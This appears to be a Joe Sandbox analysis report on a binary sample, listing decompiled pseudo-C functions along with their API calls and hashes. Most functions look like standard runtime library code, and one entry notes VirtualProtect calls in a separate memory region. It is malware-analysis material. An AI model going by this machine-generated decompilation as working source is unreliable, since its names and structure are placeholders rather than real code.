                                                      						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
                                                      						 *(_t186 + 0x38) = _t146;
                                                      						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
                                                      							L12:
                                                      							_t103 =  *(_t186 + 0x38);
                                                      							__eflags = _t103 - _t146;
                                                      							if(__eflags > 0) {
                                                      								_t176 = 0x30;
                                                      								_t172 = _t103 * _t176 >> 0x20;
                                                      								_t167 =  ~(__eflags > 0) | _t103 * _t176;
                                                      								 *((intOrPtr*)(_t186 + 0x3c)) = E00402EE1( ~(__eflags > 0) | _t103 * _t176, _t167);
                                                      							}
                                                      							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
                                                      							_v12 = _t146;
                                                      							_v16 = _t146;
                                                      							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
                                                      								L21:
                                                      								_t150 =  *(_t186 + 0x38);
                                                      								_t104 =  *((intOrPtr*)(_t186 + 8));
                                                      								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
                                                      								_t106 =  *(_t186 + 0x38);
                                                      								__eflags = _t106 - _t146;
                                                      								if(__eflags != 0) {
                                                      									_t174 = 0x10;
                                                      									_t156 =  ~(__eflags > 0) | _t106 * _t174;
                                                      									 *(_t186 + 0x40) = E00402EE1( ~(__eflags > 0) | _t106 * _t174, _t156);
                                                      								}
                                                      								__eflags =  *(_t186 + 0x38) - _t146;
                                                      								if( *(_t186 + 0x38) <= _t146) {
                                                      									L26:
                                                      									E00416138(_t186);
                                                      									return  *((intOrPtr*)( *_t186 + 0x10))();
                                                      								} else {
                                                      									_t182 = 0;
                                                      									__eflags = 0;
                                                      									do {
                                                      										E0041F330(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
                                                      										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
                                                      										_t187 = _t187 + 0xc;
                                                      										_t146 = _t146 + 1;
                                                      										_t182 = _t182 + 0x10;
                                                      										__eflags = _t146 -  *(_t186 + 0x38);
                                                      									} while (_t146 <  *(_t186 + 0x38));
                                                      									goto L26;
                                                      								}
                                                      							} else {
                                                      								_v8 = _t146;
                                                      								do {
                                                      									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
                                                      									__eflags = _t118 - _t146;
                                                      									_v20 = _t118;
                                                      									if(_t118 == _t146) {
                                                      										goto L20;
                                                      									}
                                                      									_t184 = _v12 * 0x30;
                                                      									__eflags = _t184;
                                                      									do {
                                                      										_t122 = E00406B97( &_v20);
                                                      										E00413D5B(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
                                                      										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
                                                      										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
                                                      										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
                                                      										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
                                                      										_v12 = _v12 + 1;
                                                      										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
                                                      										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
                                                      										_t184 = _t184 + 0x30;
                                                      										__eflags = _v20;
                                                      									} while (_v20 != 0);
                                                      									_t146 = 0;
                                                      									__eflags = 0;
                                                      									L20:
                                                      									_v16 = _v16 + 1;
                                                      									_v8 = _v8 + 0x28;
                                                      									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
                                                      								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
                                                      								goto L21;
                                                      							}
                                                      						}
                                                      						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
                                                      						__eflags = _t138;
                                                      						do {
                                                      							_t177 =  *_t138;
                                                      							_t172 =  *(_t177 + 0xc);
                                                      							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
                                                      							_t149 = _t149 + 1;
                                                      							_t138 = _t138 + 0x28;
                                                      							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
                                                      						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
                                                      						goto L12;
                                                      					}
                                                      					_t185 = 0;
                                                      					__eflags =  *(__ecx + 0x38);
                                                      					if( *(__ecx + 0x38) <= 0) {
                                                      						L8:
                                                      						 *(_t186 + 0x40) = _t146;
                                                      						goto L9;
                                                      					}
                                                      					_v12 = 0;
                                                      					do {
                                                      						__imp__#9( *(__ecx + 0x40) + _v12);
                                                      						_v12 = _v12 + 0x10;
                                                      						_t185 = _t185 + 1;
                                                      						__eflags = _t185 -  *(__ecx + 0x38);
                                                      					} while (_t185 <  *(__ecx + 0x38));
                                                      					__eflags =  *(__ecx + 0x38);
                                                      					if(__eflags > 0) {
                                                      						_push( *(__ecx + 0x40));
                                                      						E00402F0C(0, _t185, __ecx, __eflags);
                                                      						_push( *((intOrPtr*)(_t186 + 0x3c)));
                                                      						E00402F0C(0, _t185, _t186, __eflags);
                                                      					}
                                                      					goto L8;
                                                      				}
                                                      				E00416138(__ecx);
                                                      				return  *((intOrPtr*)( *__ecx + 0x10))();
                                                      			}




























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID: (
                                                      • API String ID: 1473721057-3887548279
                                                      • Opcode ID: 9e245cdb4b1b3db07f8c097b9736297f1d35a6d1de3b859328f47831a016493d
                                                      • Instruction ID: e2f1c9d16809879ff49900d9c467e20496c9c06d17cdb03baeed69f06c4bbff3
                                                      • Opcode Fuzzy Hash: 9e245cdb4b1b3db07f8c097b9736297f1d35a6d1de3b859328f47831a016493d
                                                      • Instruction Fuzzy Hash: EC517871A007019FCB64CF69CA819AAB7F1FF48314B514A2EE58397A91C774F881CB48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 63%
                                                      			E004146F5(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                      				signed int _v4;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				void* _v28;
                                                      				char _v36;
                                                      				intOrPtr _v44;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v56;
                                                      				char _v60;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				intOrPtr _v80;
                                                      				short _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				short _v96;
                                                      				short _v100;
                                                      				signed int _v104;
                                                      				intOrPtr _v108;
                                                      				intOrPtr _v112;
                                                      				signed int _v116;
                                                      				intOrPtr _v120;
                                                      				char _v124;
                                                      				signed int* _t79;
                                                      				void* _t90;
                                                      				intOrPtr _t97;
                                                      				intOrPtr* _t114;
                                                      				intOrPtr* _t116;
                                                      				intOrPtr* _t118;
                                                      				signed int _t120;
                                                      				signed int _t128;
                                                      				signed int _t131;
                                                      				intOrPtr _t132;
                                                      				void* _t155;
                                                      
                                                      				_t153 = __edi;
                                                      				_push(0x70);
                                                      				E0041F6EA(E00432D8F, __ebx, __edi, __esi);
                                                      				_t155 = __ecx;
                                                      				_t79 =  *(__ecx + 0x50);
                                                      				_t128 = 0;
                                                      				_t131 = 0 | _t79 != 0x00000000;
                                                      				if(_t131 != 0) {
                                                      					_push( &_v16);
                                                      					_push(0x439440);
                                                      					_v16 = 0;
                                                      					_t131 =  *_t79;
                                                      					_push(_t79);
                                                      					_v20 = 0;
                                                      					if( *_t131() < 0) {
                                                      						L19:
                                                      						return E0041F7C2(_v20);
                                                      					} else {
                                                      						if((0 | _v16 != 0x00000000) == 0) {
                                                      							goto L4;
                                                      						} else {
                                                      							_v120 = __ecx + 0xc8;
                                                      							_v112 = __ecx + 0xd8;
                                                      							_v108 = __ecx + 0xdc;
                                                      							_v124 = 0x40;
                                                      							_v116 = 0;
                                                      							_v88 = 0;
                                                      							_v76 = 0;
                                                      							_v72 = 0;
                                                      							E0041A7E4( &_v36);
                                                      							_t97 =  *((intOrPtr*)(__ecx + 0x20));
                                                      							_v4 = 0;
                                                      							if(_t97 == 0) {
                                                      								goto L4;
                                                      							} else {
                                                      								_t153 =  *((intOrPtr*)(_t97 + 0x20));
                                                      								_v104 = 0;
                                                      								if(_t153 == 0) {
                                                      									goto L4;
                                                      								} else {
                                                      									do {
                                                      										_t31 = _t128 + 0x4369f8; // 0xfffffd3b
                                                      										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
                                                      										if(_v28 != 0) {
                                                      											_t34 = _t128 + 0x4369fc; // 0x4
                                                      											_v104 = _v104 |  *_t34;
                                                      										}
                                                      										_t128 = _t128 + 8;
                                                      									} while (_t128 < 0x40);
                                                      									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
                                                      									_v100 = _v28;
                                                      									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
                                                      									_v96 = _v28;
                                                      									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
                                                      									_v84 = _v28;
                                                      									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
                                                      									_v80 = _v28;
                                                      									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
                                                      									_t114 = _v28;
                                                      									_push( &_v92);
                                                      									_push(0x439490);
                                                      									_push(_t114);
                                                      									if( *((intOrPtr*)( *_t114))() < 0) {
                                                      										_v92 = _v92 & 0x00000000;
                                                      									}
                                                      									_t116 = _v16;
                                                      									_push( &_v60);
                                                      									_push( &_v124);
                                                      									_v60 = 0x18;
                                                      									_push(_t116);
                                                      									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
                                                      										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
                                                      										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
                                                      										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
                                                      										_v20 = 1;
                                                      									}
                                                      									_t118 = _v16;
                                                      									 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                      									_t120 = _v92;
                                                      									if(_t120 != 0) {
                                                      										 *((intOrPtr*)( *_t120 + 8))(_t120);
                                                      									}
                                                      									__imp__#9( &_v36);
                                                      									goto L19;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L4:
                                                      					_push(_t131);
                                                      					_t4 =  &_v24; // 0x4423e8
                                                      					_v24 = 0x442480;
                                                      					E0041F7F4(_t4, 0x43c590);
                                                      					asm("int3");
                                                      					_push(4);
                                                      					E0041F6EA(E00431BFC, _t128, _t153, _t155);
                                                      					_t132 = E0040F014(0x104);
                                                      					_v36 = _t132;
                                                      					_t90 = 0;
                                                      					_v24 = 0;
                                                      					if(_t132 != 0) {
                                                      						_t90 = E0040D519(_t132);
                                                      					}
                                                      					return E0041F7C2(_t90);
                                                      				}
                                                      			}






































                                                      0x00414896
                                                      0x00414896
                                                      0x0041489d
                                                      0x00000000
                                                      0x0041489d
                                                      0x00414789
                                                      0x0041477f
                                                      0x0041473e
                                                      0x00414713
                                                      0x00414713
                                                      0x004037e6
                                                      0x004037ec
                                                      0x004037f0
                                                      0x004037f7
                                                      0x004037fc
                                                      0x004037fd
                                                      0x00403804
                                                      0x00403813
                                                      0x00403815
                                                      0x00403818
                                                      0x0040381c
                                                      0x0040381f
                                                      0x00403821
                                                      0x00403821
                                                      0x0040382b
                                                      0x0040382b

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3
                                                      • String ID: @
                                                      • API String ID: 431132790-2766056989
                                                      • Opcode ID: efa78f53c0518dc018037837d0fade7883eb2ca6750ca131b4e709d9f413c559
                                                      • Instruction ID: 551150b91cef73a53ffa5b2b1fed6b209468a552cb216a3673e312414697938b
                                                      • Opcode Fuzzy Hash: efa78f53c0518dc018037837d0fade7883eb2ca6750ca131b4e709d9f413c559
                                                      • Instruction Fuzzy Hash: 7651E8B0E0020A9FDB14CFA5C884AEEB7F9BF48304F14456EE516EB290E779A945CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402B10(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v52;
                                                      				intOrPtr* _v56;
                                                      				intOrPtr* _t66;
                                                      				void* _t73;
                                                      
                                                      				_t73 = __ebx;
                                                      				_v56 = __ecx;
                                                      				if(_a8 != 0) {
                                                      					if(_a4 == 0) {
                                                      						E00401040(0x80070057);
                                                      					}
                                                      					_v32 =  *((intOrPtr*)( *_v56 - 0xc));
                                                      					_v8 = _v32;
                                                      					_v36 =  *_v56;
                                                      					_v12 = _a4 - _v36;
                                                      					_v48 =  *_v56 - 0x10;
                                                      					_v40 = 1 -  *((intOrPtr*)(_v48 + 0xc));
                                                      					_v44 =  *((intOrPtr*)(_v48 + 8)) - _a8;
                                                      					if((_v40 | _v44) < 0) {
                                                      						E00402CE0(_v56, _a8);
                                                      					}
                                                      					_v52 =  *_v56;
                                                      					_v16 = _v52;
                                                      					if(_v12 > _v8) {
                                                      						E0041F3AA(_t73, _a8, _v16, _a8, _a4, _a8);
                                                      					} else {
                                                      						E0041F425(_v16, _a8, _v16 + _v12, _a8);
                                                      					}
                                                      					if(_a8 < 0 || _a8 >  *((intOrPtr*)( *_v56 - 8))) {
                                                      						E00401040(0x80070057);
                                                      					}
                                                      					 *((intOrPtr*)( *_v56 - 0xc)) = _a8;
                                                      					_t66 = _v56;
                                                      					 *((char*)( *_t66 + _a8)) = 0;
                                                      					return _t66;
                                                      				}
                                                      				return E00402C20(_v56);
                                                      			}
















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: _memmove_s
                                                      • String ID: ~hW
                                                      • API String ID: 800865076-4279806109
                                                      • Opcode ID: 931fb6340859c89c402a8088c38bd7c54ab9a0b71192c09071587e71d5b65f94
                                                      • Instruction ID: 102a0ea3eca27aeed369f946151bd1db1440c8230f948bad12f4f6323d19a1f9
                                                      • Opcode Fuzzy Hash: 931fb6340859c89c402a8088c38bd7c54ab9a0b71192c09071587e71d5b65f94
                                                      • Instruction Fuzzy Hash: 7B41E578A01108EFCB04DF99D58499EB7B2FF88310F20C15AE919AB395C735AE41CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E0041C01D(void* __ecx) {
                                                      				signed short* _t33;
                                                      				void* _t35;
                                                      				void* _t40;
                                                      				void* _t43;
                                                      				signed short _t46;
                                                      				intOrPtr _t47;
                                                      				void* _t48;
                                                      				signed short _t50;
                                                      				signed int _t52;
                                                      				void* _t53;
                                                      				intOrPtr _t54;
                                                      				void* _t55;
                                                      
                                                      				_t48 = __ecx;
                                                      				_t54 =  *((intOrPtr*)(_t55 + 0x14));
                                                      				_t53 = 0;
                                                      				if( *((intOrPtr*)(_t54 + 8)) > 0) {
                                                      					_t47 =  *((intOrPtr*)(_t55 - 0x1c));
                                                      					do {
                                                      						__imp__#9(_t47);
                                                      						_t53 = _t53 + 1;
                                                      						_t47 = _t47 + 0x10;
                                                      					} while (_t53 <  *((intOrPtr*)(_t54 + 8)));
                                                      				}
                                                      				E0041F7F4(0, 0);
                                                      				E0041B9A1(_t48);
                                                      				_t33 =  *(_t55 + 0x10);
                                                      				if(_t33 == 0) {
                                                      					_t35 = ( *(_t55 - 0x24) & 0x0000ffff) - 8;
                                                      					if(_t35 == 0) {
                                                      						__imp__#6(_t46);
                                                      					} else {
                                                      						_t40 = _t35 - 1;
                                                      						if(_t40 == 0) {
                                                      							L19:
                                                      							if(_t46 != 0) {
                                                      								 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                      							}
                                                      						} else {
                                                      							_t43 = _t40 - 3;
                                                      							if(_t43 == 0) {
                                                      								__imp__#9(_t55 - 0x44);
                                                      							} else {
                                                      								if(_t43 == 1) {
                                                      									goto L19;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t50 =  *(_t55 - 0x24);
                                                      					 *_t33 = _t50;
                                                      					_t52 = (_t50 & 0x0000ffff) + 0xfffffffe;
                                                      					if(_t52 <= 0x13) {
                                                      						switch( *((intOrPtr*)(_t52 * 4 +  &M0041C107))) {
                                                      							case 0:
                                                      								L12:
                                                      								 *(__eax + 8) = __bx;
                                                      								goto L23;
                                                      							case 1:
                                                      								 *(__eax + 8) = __ebx;
                                                      								goto L23;
                                                      							case 2:
                                                      								 *(__eax + 8) =  *(__ebp - 0x44);
                                                      								goto L23;
                                                      							case 3:
                                                      								 *(__eax + 8) =  *(__ebp - 0x44);
                                                      								goto L23;
                                                      							case 4:
                                                      								__ecx =  *(__ebp - 0x44);
                                                      								 *(__eax + 8) =  *(__ebp - 0x44);
                                                      								__ecx =  *(__ebp - 0x40);
                                                      								 *(__eax + 0xc) = __ecx;
                                                      								goto L23;
                                                      							case 5:
                                                      								__bx =  ~__bx;
                                                      								asm("sbb ebx, ebx");
                                                      								goto L12;
                                                      							case 6:
                                                      								__esi = __ebp - 0x44;
                                                      								__edi = __eax;
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								goto L23;
                                                      							case 7:
                                                      								goto L23;
                                                      							case 8:
                                                      								_t33[4] = _t46;
                                                      								goto L23;
                                                      						}
                                                      					}
                                                      				}
                                                      				L23:
                                                      				 *(_t55 - 4) = 0;
                                                      				E0041B9F7(_t55 - 0x58);
                                                      				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
                                                      				if( *((intOrPtr*)(_t55 - 0x2c)) != 0) {
                                                      					_push( *((intOrPtr*)(_t55 - 0x30)));
                                                      					_push(0);
                                                      					E0040D3B7();
                                                      				}
                                                      				return E0041F7E5(_t46, _t53, _t54);
                                                      			}
















                                                      APIs
                                                      • VariantClear.OLEAUT32(?), ref: 0041C02B
                                                      • __CxxThrowException@8.LIBCMT ref: 0041C03E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ClearException@8ThrowVariant
                                                      • String ID: XpC
                                                      • API String ID: 3645285410-1560596422
                                                      • Opcode ID: c6d49d499b5d8eaa98cd637276b1d5e44ea3e0b00cd18839773f064d833eb071
                                                      • Instruction ID: d9f4d4b0c6ef5e2124660a129b9ddfcdd11f384d2037844c7c04da0540221948
                                                      • Opcode Fuzzy Hash: c6d49d499b5d8eaa98cd637276b1d5e44ea3e0b00cd18839773f064d833eb071
                                                      • Instruction Fuzzy Hash: 08218E30984208CFCB10DFE5CCC46EDBBB1FF49310F25815AD55A272A1C7396A8ADB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02242468
                                                      • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 022424B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: @
                                                      • API String ID: 544645111-2766056989
                                                      • Opcode ID: 5513344821bccb8160ac3e9adfcad24b54b83ce4cda6f70f3991fed36bdac42e
                                                      • Instruction ID: 323fd1d6d7f24f045f515478f8f25cfdcc0ea00a18e8c4a415f11994b32d87bb
                                                      • Opcode Fuzzy Hash: 5513344821bccb8160ac3e9adfcad24b54b83ce4cda6f70f3991fed36bdac42e
                                                      • Instruction Fuzzy Hash: 3221D8B4E10209EFDB18CFD5C984BAEBBB5FF44304F608699E905AB244CB74AA40DB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E00404429(void* __ecx) {
                                                      				signed int _v8;
                                                      				char _v16;
                                                      				char _v18;
                                                      				char _v280;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t11;
                                                      				long _t14;
                                                      				intOrPtr _t15;
                                                      				char* _t18;
                                                      				intOrPtr _t21;
                                                      				intOrPtr _t33;
                                                      				signed int _t36;
                                                      
                                                      				_t11 =  *0x443590; // 0xa920217c
                                                      				_v8 = _t11 ^ _t36;
                                                      				_t35 = 0x104;
                                                      				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
                                                      				if(_t14 == 0 || _t14 == 0x104) {
                                                      					L4:
                                                      					_t15 = 0;
                                                      					__eflags = 0;
                                                      				} else {
                                                      					_t18 = PathFindExtensionA( &_v280);
                                                      					_t35 = "%s.dll";
                                                      					asm("movsd");
                                                      					asm("movsw");
                                                      					_t32 =  &_v280;
                                                      					_t41 = _t18 -  &_v280 + 7 - 0x106;
                                                      					asm("movsb");
                                                      					_t33 = _t33;
                                                      					if(_t18 -  &_v280 + 7 > 0x106) {
                                                      						goto L4;
                                                      					} else {
                                                      						E00403EBB(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
                                                      						_t15 = E00404142(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
                                                      					}
                                                      				}
                                                      				return E0041E5DF(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
                                                      			}


















                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0040444F
                                                      • PathFindExtensionA.SHLWAPI(?), ref: 00404465
                                                        • Part of subcall function 00403EBB: _strcpy_s.LIBCMT ref: 00403EC7
                                                        • Part of subcall function 00404142: __EH_prolog3.LIBCMT ref: 00404161
                                                        • Part of subcall function 00404142: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 00404182
                                                        • Part of subcall function 00404142: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00404193
                                                        • Part of subcall function 00404142: ConvertDefaultLocale.KERNELBASE(?), ref: 004041C9
                                                        • Part of subcall function 00404142: ConvertDefaultLocale.KERNELBASE(?), ref: 004041D1
                                                        • Part of subcall function 00404142: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 004041E5
                                                        • Part of subcall function 00404142: ConvertDefaultLocale.KERNEL32(?), ref: 00404209
                                                        • Part of subcall function 00404142: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040420F
                                                        • Part of subcall function 00404142: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00404248
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                      • String ID: %s.dll
                                                      • API String ID: 3444012488-3668843792
                                                      • Opcode ID: 8e7e12c1d50eaefc46e865cbfd3ee717ae355514b69d53891cd43f448e5456b4
                                                      • Instruction ID: 19a3236b257a23e403f0296e6cb30a89f0e944724a7da86974bbd27a45870086
                                                      • Opcode Fuzzy Hash: 8e7e12c1d50eaefc46e865cbfd3ee717ae355514b69d53891cd43f448e5456b4
                                                      • Instruction Fuzzy Hash: B50179B19001186FCB19DF64DD56AEF77B9EF44704F4101BABA06F3180EA789F448AA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E0041A311(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t29;
                                                      				void* _t47;
                                                      				void* _t51;
                                                      				void* _t53;
                                                      				void* _t54;
                                                      
                                                      				_t54 = __eflags;
                                                      				_t47 = __edx;
                                                      				_push(0xc);
                                                      				E0041F6EA(E00433470, __ebx, __edi, __esi);
                                                      				_t51 = E0040DB94(__ebx, __edi, __esi, _t54);
                                                      				E0040FA7F(__ebx, _t51, _t53, 1);
                                                      				_t2 = _t51 + 0x34; // 0x34
                                                      				_t49 = _t2;
                                                      				 *((intOrPtr*)(_t53 - 0x14)) = 0;
                                                      				E0040FF4A(_t2, _t53 - 0x10, 0x436e68, _t53 - 0x14);
                                                      				 *((intOrPtr*)(_t53 - 4)) = 0;
                                                      				while( *((intOrPtr*)( *(_t53 - 0x10) - 0xc)) != 0) {
                                                      					UnregisterClassA( *(_t53 - 0x10),  *(E0040DB94(0, _t49, 0x436e68, __eflags) + 8));
                                                      					_t29 = E0040FF4A(_t49, _t53 - 0x18, 0x436e68, _t53 - 0x14);
                                                      					 *((char*)(_t53 - 4)) = 1;
                                                      					E004071CF(_t53 - 0x10, _t53, _t29);
                                                      					__eflags =  *((intOrPtr*)(_t53 - 0x18)) + 0xfffffff0;
                                                      					 *((char*)(_t53 - 4)) = 0;
                                                      					E00403036( *((intOrPtr*)(_t53 - 0x18)) + 0xfffffff0, _t47);
                                                      				}
                                                      				E00402C20(_t49);
                                                      				E0040FAEC(1);
                                                      				return E0041F7C2(E00403036( &(( *(_t53 - 0x10))[0xfffffffffffffff0]), _t47));
                                                      			}









                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 0041A318
                                                        • Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
                                                        • Part of subcall function 0040FA7F: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
